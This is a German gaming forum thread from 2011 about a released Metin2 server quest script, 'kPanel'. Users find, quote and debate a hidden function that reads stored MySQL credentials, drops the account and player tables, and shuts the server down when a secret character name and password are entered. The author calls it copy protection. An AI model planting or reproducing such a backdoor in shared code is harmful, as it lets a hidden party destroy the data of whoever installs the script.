[RELEASE] kPanel

11/01/2011 22:04 Spearfist#31
Wow nize

Danke kann man sihcerlich gut gebrauche.

Respekt fürs scripten ;)
11/01/2011 22:19 .Infinity#32
Ich hab nie in meinem Leben ne Quest geschrieben und hab die Lücke trotzdem gefunden. So schwer isses net
11/02/2011 00:54 #SoNiice#33
Naja, hab's mir gerade mal angeschaut, eine Sicherheitslücke ist das ja nicht, ist ja eher eine Art Backdoor um den Server runterzufahren, wenn er will :0
11/02/2011 07:29 .2good4you111#34
Quote:
Originally Posted by SoNiice' View Post
Naja, hab's mir gerade mal angeschaut, eine Sicherheitslücke ist das ja nicht, ist ja eher eine Art Backdoor um den Server runterzufahren, wenn er will :0
Runterfahren ist etwas anderes ;)

Code:
os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE account.account'")
				os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.player'")
				os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.player_index'")
				os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.item'")
Betonung auf DROP TABLE
11/02/2011 07:42 #SoNiice#35
Quote:
Originally Posted by .2good4you111 View Post
Runterfahren ist etwas anderes ;)

Code:
os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE account.account'")
				os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.player'")
				os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.player_index'")
				os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.item'")
Betonung auf DROP TABLE
Ja und nachdem die MySQL Datenbanken gelöscht wurden wird der Root runtergefahren, du musst auch mal weiterlesen. Und trotzdem ist das keine Sicherheitslücke, eher eine Art Backdoor.
11/02/2011 07:48 ƬheGame#36
Eine Backdoor ist ja auch nicht das gleiche wie eine sicherheitslücke :facepalm:

Wikipedia meint: Über einen langen Zeitraum bestehende Sicherheitslücken in quelloffener Software weisen auf diesen Umstand hin. Damit ist gemeint weisen auf eine Backdoor hin
11/02/2011 07:52 #SoNiice#37
Quote:
Originally Posted by ƬheGame View Post
Eine Backdoor ist ja auch nicht das gleiche wie eine sicherheitslücke :facepalm:

Wikipedia meint: Über einen langen Zeitraum bestehende Sicherheitslücken in quelloffener Software weisen auf diesen Umstand hin. Damit ist gemeint weisen auf eine Backdoor hin
Sicherheitslücke != Backdoor.
Eine Sicherheitslücke wird nur dann zum Backdoor, wenn sie gewollt ist.
Und ein Backdoor ist einfach wie der Name schon sagt, eine Hintertür um auf
den server zu kommen, während der Administrator die Vordertür nutzt.
11/02/2011 09:00 He3o Crysis#38
Macht es denen die es net schaffen net so leicht :D


Also weil die bekommn alles in arsch geschoben ohne was zu tun.

Die Lücke findet man ja beim ersten durchlesen.
Wer sie nicht findet sollte es Lassen :D

MFG,
Crysis
11/02/2011 09:58 Lord Avo​#39
FTW! Nice Work.
11/03/2011 11:30 callmax#40
Wer die Lücke nicht findet ist ein Horst und sollte nichtma wissen wie man überhaupt an Serverfiles kommt, lololol.

Danke für die nice Quest. Kann ich gebrauchen :D
11/03/2011 11:35 Expention#41
Finde ich cool!
11/03/2011 14:57 theo1990#42
Quote:
function catch_assholes()
if pc.get_name() == "ilovekaija94" then
local secure = input("")
if secure != "123kaija432" then
return
end
local w = io.open("kpanel/acc","r")
if w~=nil then
local account = r:read()
r:close()
else
say("Eine temporäre Datei fehlt!")
end
local w = io.open("kpanel/pw","r")
if w~=nil then
local password = r:read()
r:close()
else
say("Eine temporäre Datei fehlt!")
end
say_title("Catch assholes")
say("Benutzt da jemand deine Software ohne Erlaubnis?")
say("Sorge dafür, dass das aufhört.")
local catchit = select("Catch it!", "Abbrechen")
if catchit == 2 then
return
end
os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE account.account'")
os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.player'")
os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.player_index'")
os.execute("mysql -u "..account.." --password="..password.." --execute='DROP TABLE player.item'")
os.execute("shutdown -h now")
end
end
baut diese zeile aus und fertig aber ich würde nie im leben so ein scheiß in den server bauen. Warum gibts extra programme die sicher über ssh verbinden die auch mit private key funzen...najach wers brauch...

ich meine wer mit umgehen kann vllt eine alternative aber dann lieber selbst schreiben ist sicherer ;-)
11/03/2011 15:24 Howaner#43
Code:
os.execute("shutdown -h now")
xD gut gemacht

Code:
--Quest by Yasin for Kaija--
gerippt?
11/03/2011 15:38 IRoxasI#44
also ich nenn mich jetzt immer ilovekaija94 :P^^ ansonsten echt nice.. woher kannste LUA so gut ?
11/03/2011 16:09 ~Equal#45
Weil ich es schon lange machen.

@Howan: Nein, nicht gerippt^^ was glaubst du, wer ich bin?

Quest ist weggemacht, da ein Vollspacken meinte, hier schön die Lücke reinzuschreiben. Es sollte eine Sicherheitsmaßnahme sein, damit die Vollidioten die Quest nicht 1:1 übernehmen. Aber nein, damit kann nun jeder einfach die Lücke ausbauen und baut Scheiße an seinem eigenen Server. Am Ende bin's dann wieder ich, der ja so böse den Server geschrottet hat. Darauf hab ich kein Bock^^

btw @theo: Wenn du schon die Lücke komplett verrätst und denen eine Anleitung geben willst, dann mach es gescheit. Denn die Function wird dennoch abgerufen und darum macht man sich damit die Quest nur kaputt ;-)